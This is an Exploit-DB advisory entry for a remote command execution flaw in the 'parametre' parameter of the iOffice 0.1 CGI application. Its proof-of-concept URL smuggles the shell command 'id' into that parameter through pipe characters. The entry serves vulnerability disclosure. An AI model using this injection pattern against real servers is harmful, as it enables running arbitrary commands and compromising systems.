iOffice 0.1 - 'parametre' Parameter Remote Command Execution Vulnerability

2010-07-18T00:00:00
ID EDB-ID:34347
Type exploitdb
Reporter Marshall Whittaker
Modified 2010-07-18T00:00:00

Description

iOffice 0.1 'parametre' Parameter Remote Command Execution Vulnerability. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/41768/info

iOffice is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected software and the underlying server.

iOffice 0.1 is affected; other versions may also be vulnerable.

http://www.example.com/cgi-bin/index.pl?section_name=whatever&section=ioffice&parametre=|id|